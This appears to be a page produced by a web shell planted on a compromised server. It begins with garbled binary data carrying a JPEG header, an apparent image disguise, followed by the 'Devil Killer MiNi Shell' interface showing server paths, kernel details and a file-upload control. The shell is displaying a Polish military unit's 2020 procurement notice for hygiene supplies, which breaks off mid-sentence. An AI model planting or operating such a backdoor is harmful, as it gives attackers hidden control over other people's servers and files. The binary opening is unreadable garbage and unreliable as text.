JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200528/543811-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 543811-N-2020 z dnia 2020-05-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">31 Wojskowy Oddział Gospodarczy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup środków do higienizacji bloku żywnościowego dla Służby Żywnościowej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zakup środków do higienizacji bloku żywnościowego dla Służby Żywnościowej</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">31 Wojskowy Oddział Gospodarczy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">10106725600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Konstantynowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">85</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">95-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Zgierz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">26 1442098</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">31wog.zp@ron.mil.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">26 1442101</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.31wog.wp.mil.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.31wog.wp.mil.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Obrona</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.31wog.wp.mil.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.31wog.wp.mil.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup środków do higienizacji bloku żywnościowego dla Służby Żywnościowej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">58/ZP/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest zakup środków do higienizacji bloku żywnościowego dla Służby Żywnościowej w celu zapewnienia właściwego i higienicznego utrzymania budynków i etapów produkcji żywności w obiektach bloku żywnościowego użytkowanych przez 31 WOG Zgierz.Szczegółowy opis przedmiotu zamówienia określono w załączniku nr 1 do SIWZ -formularz cenowy, załącznik nr 1 do Umowy OPZ.2.Wymagania dotyczące dostawy:1.Wymagania obligatoryjne – standardy jakościowe:a)Produkty z zadania nr 4, 5 i 6 poz. Od 1 do 7 muszą pochodzić od tego samego producenta i muszą być ujęte w planie higieny w kompleksowym stosowaniu w obiektach bloku żywnościowego. Muszą się nawzajem uzupełniać w planie higieny w stosowaniu codziennym i okresowym. b)Produkty powinny posiadać aktualną kartę charakterystyki preparatów zgodnie z systemem REACH oraz Rozporządzeniem nr 1907/2006 Parlamentu Europejskiego i Rady z dnia 18.12.2016r. wraz z późn. zm.;c)Produkty przeznaczone do dezynfekcji powinny posiadać Pozwolenie Ministra Zdrowia na obrót produktami biobójczymi wydane na podstawie – Ustawy o produktach biobójczych z dnia 09 października 2015r. (tj. Dz. U. 2018, poz. 122 z późn. zm.) 2.Wymagania obligatoryjne – standardy logistyki dystrybucji:a)produkty winny być pakowane i dystrybuowane w indywidualnych i zbiorczych opakowaniach;b)opakowania indywidualne winny być odporne na działanie środków w nich przechowywanych oraz na silne uszkodzenia mechaniczne (m.in. upadek na twardą powierzchnię z wysokości 1m);c)opakowanie jednostkowe winno posiadać zamknięcie, które gwarantuje pełną jego szczelność przed i po jego wielokrotnym otwarciu oraz plomby jednorazowe ulegające samozniszczeniu w trakcie pierwszego otwarcia; d)opakowania jednostkowe powinny być znakowane standardowymi etykietami, informującymi użytkownika m.in. o warunkach magazynowania i przechowywania, środkach bezpieczeństwa i zagrożeniach; e)opakowania jednostkowe o wadze powyżej pięciu kilogramów, winny posiadać indywidualny, wygodny uchwyt do przenoszenia i przelewania produktu; f)etykieta na opakowaniu jednostkowym powinna co najmniej zawierać: •nazwę, logo, adres producenta; •opis przygotowania produktu do użycia i sposób jego stosowania; •opis składu chemicznego; •czas skutecznego działania w przypadku środków dezynfekcyjnych; •sposób dozowania; •informacja o środkach ostrożności, w postaci znaków graficznych; •ilość i pojemność opakowania indywidualnego i zbiorczego; •numer serii i datę produkcji oraz okres przydatności do użycia. g) oznakowanie powinno zawierać: •Informacje o warunkach użytkowania materiałów i wyrobów, jeżeli jest to niezbędne dla zdrowia lub życia człowieka. 3.Wykonawca zobowiązany jest do:a)	Dostarczenia systemów dozujących i mieszających wraz z ich montażem we wskazanych miejscowościach (Tomaszów Mazowiecki, Leźnica Wielka, Nowy Glinnik, Łódź ul. Źródłowa i 6-sierpnia, Zgierz i Kutno) w następujących ilościach:•Urządzenia dozujące do płynu myjącego oraz nabłyszczacza w zmywarkach z elektronicznym pomiarem przewodności metodą indukcyjną wraz z kontrolą poziomu płynu w pojemnikach z sygnalizacją alarmową w przypadku braku płynu – w ilości 20 kpl. – do 7 dni od podpisania umowy, jednak nie dłuższym niż oferowany przez Wykonawcę terminem dostawy;•Dwu/trzy funkcyjne mieszalniki z wężem 20m – w ilości 20 kpl. – do 7 dni od podpisania umowy, jednak nie dłuższym niż oferowany przez Wykonawcę terminem dostawy,•Dozowniki do dozowania płynu na gąbkę om pojemności min. 0,8 l z możliwością kontroli wzrokowej zbiornika oraz z podziałką w ml – w ilości 30 szt.,•Dozowniki/butelki ze spryskiwaczem o poj. 0,5-1,0 litra do właściwego użytkownika środków czystości, każdy środek oraz dozowniki muszą posiadać etykiety w języku polskim z opisem stosowania (około 40 szt.)•Pompki – spryskiwacze strumieniowe z długimi wężykami o dł. 50 cm, odporne na działanie kwasów i zasad, b)Zapewnić okresowy serwis zamontowanych urządzeń;c)Wraz z przedstawicielem Zamawiającego powinien dokonać przeglądu obiektów służby żywnościowej oraz rozplanować efektywne i zasadne zamontowanie urządzeń dozujących środki;d)Przeprowadzić nieodpłatne szkolenia z zakresu obsługi urządzeń, użytkowania środków chemicznych, higieny osobistej, BHP w postepowaniu z koncentratami chemicznymi, mikrobiologii i HACCP całego stanu osobowego personelu na obiektach przed wprowadzeniem środków do stosowania (7 stołówek i magazyny żywnościowe);e)Opracować i dostarczyć plany higieny zgodny z HACCP w oparciu o oferowane produkty gotowe do zamontowania w formie łatwo zmywalnej – 20 kpl;f)Dostarczyć odpowiednią ilość niezbędnych plansz stanowiskowych, instrukcji i plansz parametrycznych.4.Produkty z zadań 1,2,3,4,5 i 6 poz. 1-14 – minimalny okres ważności powinien wynosić nie mniej niż 12 miesięcy od daty dostawy. 5.Produkty z poz. 4-11 (zadanie nr 8) i zadanie 9 muszą posiadać atest lub certyfikat produktu lub ulotki producenta na kontakt z artykułami żywnościowymi. Towary muszą być fabrycznie nowe, zgodnie z HACCP nieużywane oraz odpowiadać obowiązującym normom z zakresu gatunku pierwszego.Towar musi być dostarczony w oryginalnym opakowaniu fabrycznym z zabezpieczeniami stosowanymi przez producenta. Opakowanie musi umożliwić pełną identyfikację towaru np. ilość, rodzaj, parametry, data ważności itp. bez konieczności naruszania opakowania. Zamawiający zastrzega sobie prawo do przeprowadzenia badań laboratoryjnych dostarczonych środków w akredytowanym laboratorium spełniającym normy PN-EN ISO/IEC 17025, na zgodność z kartami charakterystyki i opisami na koszt Wykonawcy jeden raz w czasie trwania umowy. Okres gwarancji na cały przedmiot umowy wynosi 12 miesięcy od daty odbioru towaru.3.Zamawiający dopuszcza składanie ofert częściowych w podziale na 9 zadań tj.:•Zadanie nr 1 antybakteryjne mydło do rąk;•Zadanie nr 2 - środek do dezynfekcji rąk;•Zadanie nr 3 - środek do dezynfekcji rąk;•Zadanie nr 4 – środek do dezynfekcji powierzchni roboczych;•Zadanie nr 5 - środki do mycia i dezynfekcji powierzchni;•Zadanie nr 6 – środki do higienizacji obiektów bloku żywnościowego;•Zadanie nr 7 – materiały eksploatacyjne do ekspresów;•Zadanie nr 8 – środki do higienizacji obiektów bloku żywnościowego;•Zadanie nr 9 – rękawiczki lateksowe;4.Wykonawca może złożyć jedną ofertę na jedno lub więcej zadań.5.Wykonawca obowiązany jest podać w Formularzu cenowym (Załącznik nr 1 do SIWZ):•producenta zaoferowanego produktu;•nazwę handlową lub numer katalogowy zaoferowanego produktu, •ceny jednostkowe netto, wartość netto, wartość brutto dla pozycji w zadaniu, na które składa ofertę.Brak podania w/w danych skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt. 2 ustawy Pzp.6.W trakcie badania i oceny ofert Zamawiający będzie rozpatrywał każde zadanie oddzielnie.Zamawiający dopuścił towary równoważne:•w zadaniu nr 1,2,3,4,5•w zadaniu nr 6 poz. 1,2,3,4,5,6,7,8,10,11,12,13 Produkt równoważny musi służyć do tego samego celu, posiadać parametry takie same lub lepsze co produkty opisane przez Zamawiającego. Ciężar udowodnienia równoważności oferowanych produktów spoczywa na Wykonawcy.W przypadku zaoferowania przez Wykonawcę towarów równoważnych, Wykonawca zobowiązany jest wraz z towarem dostarczyć właściwe certyfikaty, oświadczenia producenta.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39831210-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39831240-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39831250-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39832000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39800000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39514200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33763000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33764000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33741300-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39222000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18937000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33772000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18424300-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">21</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>21</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający 